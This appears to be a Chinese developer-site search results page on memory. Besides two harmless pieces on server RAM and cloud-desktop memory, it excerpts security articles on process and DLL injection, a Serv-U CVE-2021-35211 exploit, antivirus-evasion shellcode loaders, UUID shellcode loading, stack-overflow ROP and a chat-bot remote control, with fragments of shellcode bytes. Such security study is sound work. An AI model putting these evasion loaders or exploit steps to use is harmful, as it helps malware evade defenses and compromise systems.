首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

为什么服务器内存硬件上的黑色颗粒这么多?

之前有位读者问我为什么服务器内存上有这么多的颗粒,今天我专门就这个话题成文一篇作为回复。 各位从事服务器端开发的同学天天都在开发代码,代码都需要内存。确实了解一下服务器内存硬件是挺有有必要的。...所以我特地找来了一个服务器内存条来。下图是一个 32 GB 服务器内存条的正面和反面图。 可见服务器内存上有很多的黑色颗粒,相比下面的台式机内存颗粒要多很多。...今天我们就专门写一篇文章来给大家解释为什么服务器内存中颗粒更多的原因。...因此总的来说,服务器对稳定性的要求极高,不允许比特翻转错误发生。 ECC 是一种内存专用的技术。...所有的信号通过RCD进入RDIMM后都会重新计时和清理。 从开篇的图中,我们确实也找到了这个模块。 有了这个模块的支持,能显著降低信号干扰,进而大幅提升稳定性。这样单条内存的容量可以做到更大一些。

9610
您找到你想要的搜索结果了吗?
是的
没有找到

云桌面学习室服务器内存怎么选择?为什么要选择一个内存大的?

云桌面学习室服务器内存是云桌面必不可少的一个配置,它将会直接影响云桌面的速度,它的内存越大,它使用起来也会更加的方便。...在购买云桌面学习室服务器是一定要看好它的内存,如果你选择的云桌面内存太小,那么操作起来也会很不顺畅。且随着你使用的时间越来越长,它就是越卡。 云桌面学习室服务器内存怎么选择?...通常来说,云桌面服务器内存都是1G往上,不过在选择的时候也要根据自己的需求来选择。...为什么要选择一个内存大的? 云桌面学习室服务器内存就相当于我们手机的内存一样,当然是内存越大,下载的东西也就越多。如果内存太小,不仅自己玩的不开心,还会造成手机的卡顿和闪退。...不过也不要选择太大的,选择的内存过大,可能会造成云服务器资源的浪费。 大数据时代,以后云桌面肯定会在很多方面发挥作用。而云桌面学习室服务器内存无疑是其中最重要的一个点,所以好好选择也是很重要的。

13.2K50

ProcessInjection之概述

打开进程 6、使用VirtualAllocEx分配内存 7、使用WriteProcessMemory写入内存 8、使用CreateRemoteThread创建线程。...下面是第二种方法,dll注入 1、使用VirtualAllocEx分配一个内存 2、使用WriteProcessMemory把dll路径名字复制到第一步分配的内存中 3、使用GetProcAddress...Kernel32.dll会被加载到所有的windows进程中,其中有一个函数为LoadLibrary,当其被调用时,它会将一个dll映射到该进程中,LoadLibrary需要知道自己需要加载的dll,所以需要给它提供一个...LoadLibrary就会帮你把该dll加载到内存中。...而LoadLibrary在所有的进程中的基地址都是一样的,所以我们便可以将Kernel32.dll传递给GetModuleHandle再使用GetProcAddress获取其地址。 ?

86620

创建漏洞利用:SolarWinds 漏洞 CVE-2021-35211

读取内存地址处的值rax并将其存储在rax寄存器中。 例如,如果rax=0x123456789上面的指令读取内存地址的 8 个字节0x123456789并将该值存储在rax寄存器中。...双小工具是一种妥协,因为我真的不想让我的有效负载的 0x38 字节被吃掉,add rsp, 0x38,但它完成了工作并且是我拥有的最好的,所以我选择了它。...第一步是在 Serv-U 的.data段中找到一个可写的内存地址,我可以在其中写入一个字符串。我使用 Hopper 在数据段中查找没有与任何代码交叉引用的部分;假设是内存区域确实未被使用。...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a...事实证明这很容易,因为堆栈帧包含返回地址Serv-U.dll,正如我们之前看到的那样,它不支持 ASLR。 结果,我可以简单地查看在调用点获取的堆栈跟踪call r9并记下那里的地址。

2K20

免杀tips——敏感函数处理过国内主流杀软

✎ 阅读须知 乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。...目前市面上的绝大多数杀软基于判断一个exe是否为木马,无非就是敏感函数或是调用敏感的api、特征库匹配、hash值、监控内存之类的 ,所以静态的还是比较好过的,稍微处理一下自己的shellcode基本上是都可以过的...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\...大小 shellcode_size = sizeof(buf); /* VirtualAlloc( NULL, // 基址 800, // 大小 MEM_COMMIT, // 内存页状态...NULL, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // 将shellcode复制到可执行的内存页中

1.1K40

从火绒特征码识别到免杀的思考...

免杀载体:msfpayload,用的汇编直接加载 免杀目标:火绒 1.免杀载体介绍 是一个简单的内联汇编加载shellcode的payload,为什么用这个呢,因为这个我们之后反汇编起来比较简单。...// #include "stdafx.h" #pragma comment(linker, "/section:.data,RWE")//对于内存的保护属性 可读可写可执行 #pragma comment...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c" "\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b...大家注意到没有,由于shellcode是要支持直接在内存中运行的代码,所以上面的代码中调用函数的过程全部都是通过hash的方式去调用的函数,那么除了hash调用的方法之外还有没有其他的呢?...总结 思路很重要,大家学习免杀的时候不要光学代码去了,一定要思考为什么能免杀,为什么不能免杀,多从杀毒软件的角度去思考很重要。

1.5K50

pyinstaller打包逆向分析,顺便免杀Windows Defender

✎ 阅读须知 乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。...设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存...设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存...大概2分钟之后,360报毒 关闭所有的杀毒之后,分别在win10和winserver2019上运行正常,win7本地运行报错 从网上查到了相关的资料: failed to execute script...python打包的exe如何加密 总体上来讲,python打包的exe都是可以破解的,就算使用cython来写,依旧是可以破解的,只是时间问题而已,但是在这还是提出一些略微有效的方法(自欺欺人) 将所有的代码进行封装为一个函数

2.5K20

构建ROP链实现远程栈溢出

如上图就是运行后的FTP服务器,通过nc工具链接服务端的地址nc 192.168.1.8 9999 可以得到一个FTP交互环境,此时可以执行send | hello world命令,来向服务器发送一段字符串...,同时服务器会返回给你Data received successfully这样的提示信息,好了我们开始分析程序并挖掘漏洞吧。...此时我们需要寻找一个跳板,能够动态的定位栈地址的位置,在这里我们使用jmp esp作为跳板指针,其基本思路是,使用内存中任意一个jmp esp地址覆盖返回地址,函数返回后被重定向去执行内存中jmp esp...\x2b" buf += b"\xc9\xb1\x56\x83\xe8\xfc\x31\x58\x0f\x03\x58\xb1\x43" buf += b"\xbb\xc7\x25\x01\x44\x38...小总结: 上方我们所演示的就是典型的基于内存的攻击技术,该技术的优势就是几乎很难被发现,100%的利用成功率,内存攻击技术就是利用了软件的安全漏洞,该漏洞的产生表面上是开发人员没有对缓冲区进行合理的检测

79820

免杀|记一次cs样本免杀实践

;除了这两个查杀方式之外,一些杀软还有一些其他的查杀方式,常见有的:行为查杀(对一些系统行为进行检测,包括但不限于进程创建、驱动程序加载、注册表修改、磁盘访问、内存访问和网络连接等,还有一些注入行为,远程进程注入...\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\...sleep的时机,并插入我们加解密的代码2、如何准确的找到所有的恶意代码,因为我们要对其进行加解密,所以我们要在内存空间中准确的找到所有恶意代码第一个问题,如果学习过逆向技术的师傅们,应该很快就能想到,...beacon,其申请的空间都是私有的可读可写可执行的空间,其他正常内存属性都不会是这样;如下图,右边是之前的属性(RW),左边是被处理修改后的属性(ERW)所以我们可以通过内存页遍历,从内存属性出发去找对应的属性...”反着看“大小;有点离谱,这里笔者也没懂,为什么会这样,为什么cobaltstrike在申请一个存储文件形式beacon的空间的时候申请了一个相对大的空间,在申请一个内存形式beacon的空间的时候申请了一个相对小的空间

1.1K10

Linux通过栈溢出进行提权实战

NFS使用远程过程调用(RPC)在客户端和服务器之间路由请求。Root Squashing参数阻止对连接到NFS卷的远程root用户具有root访问权限。...尝试http下载但没有成功,以后遇到bash反弹的就架个服务器,遇到ssh的还是用sftp更方便点; ? 我这里用得是MobaXterm;运行下程序看看; ?...那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过 3、NX:NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行...\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42...\x75\x4a\x49\x35" "\x61\x58\x49\x4c\x49\x48\x4b\x50\x6a\x51\x56\x51\x48\x68\x4d" "\x4b\x30\x42\x4a\x53

1.9K10

红队技巧-利用uuid加载shellcode

近期国外的Tweet上面的Check Point Research发布了一篇有趣的推文: 这篇推文大概讲的是通过分析了一个恶意样本,找到一种非常有趣的向内存写入shellcode方式。...rift-analysing-a-lazarus-shellcode-execution-method/ 值得注意的是: 在自定义代码中,攻击者使用了windows api 遍历了大量硬编码 UUID 值列表,并且每次都提供指向分配内存...看一个示例: COMB(combine)型是数据库特有的一种设计思想,可以理解为一种改进的GUID,它通过组合GUID和系统时间,以使其在索引和检索事有更优的性能,数据库中没有COMB类型,它是Jimmy...0, 0);//获得可执行的句柄 void* ha = HeapAlloc(hc, 0, 0x100000);//申请堆空间 if (ha == NULL) { cout << "内存申请失败...哈哈哈哈哈哈哈哈哈 学习总结 这里虽然还是给杀了,那是因为这种uuid还是存在一定的特征,还是会被杀,但是这里讲究的是一个思路,可以用其他windows api 来向内存中写入shellcode,加载shellcode

1.7K30

红队技巧-利用uuid加载shellcode

y 点击蓝字关注我哦 近期国外的Tweet上面的Check Point Research发布了一篇有趣的推文: 这篇推文大概讲的是通过分析了一个恶意样本,找到一种非常有趣的向内存写入shellcode...rift-analysing-a-lazarus-shellcode-execution-method/ 值得注意的是: 在自定义代码中,攻击者使用了windows api 遍历了大量硬编码 UUID 值列表,并且每次都提供指向分配内存...看一个示例: COMB(combine)型是数据库特有的一种设计思想,可以理解为一种改进的GUID,它通过组合GUID和系统时间,以使其在索引和检索事有更优的性能,数据库中没有COMB类型,它是Jimmy...0, 0);//获得可执行的句柄 void* ha = HeapAlloc(hc, 0, 0x100000);//申请堆空间 if (ha == NULL) { cout << "内存申请失败...哈哈哈哈哈哈哈哈哈 学习总结 这里虽然还是给杀了,那是因为这种uuid还是存在一定的特征,还是会被杀,但是这里讲究的是一个思路,可以用其他windows api 来向内存中写入shellcode,加载shellcode

1.1K10

红队作业 | 钉钉机器人远控服务器体验

本次作业是使用钉钉机器人来实现远控服务器!...1、登录钉钉开放平台 可以先创建一个企业 选择应用开发,企业内部开发,添加一个机器人 记录生成的密钥 配置好开发管理,服务器出口IP添加VPS的地址,消息接收地址为一个可以接收数据的url,该url...验证不通过') print('有get请求') if __name__ == '__main__': app.run(host='0.0.0.0', port=9000) 3、在开发管理的服务器上启动服务...4、调试 在钉钉开放平台上选择调试 打开钉钉,会有一个TEST版本的群聊,可以在里面进行测试 可以看到,命令执行成功,服务器端请求成功 参考: 钉钉机器人设置: https://open.dingtalk.com...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59

1.5K20

【免杀】C++静态免杀学习

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。...复现其他师傅的免杀 2.1 c++部分 其实他这部分代码的逻辑就是一个利用自己的密钥进行解密,解密之后再申请内存,执行shellcode,在这里先将别人的代码下载下来,在本地跑一下: 先把项目下载,然后把...xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\

2.1K30

利用加载器以及Python反序列化绕过AV

前言 在日常红队行动中,为了利用目前现有的资源尝试获取更多的凭据以及更高的权限,我们通常需要先获得一台主机作为突破口,并将其作为跳板进行横向渗透。...但是内网中一般部署有防火墙、流量监控等设备,杀软更是成为了服务器的标配,所以如何进行免杀绕过杀软的限制让主机上线成了我们首要解决的问题之一。...目前免杀技术大致分为以下几类: 特征码修改 花指令免杀 加壳免杀 内存免杀 二次编译 分离免杀 资源修改 ......\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\

1.1K30
领券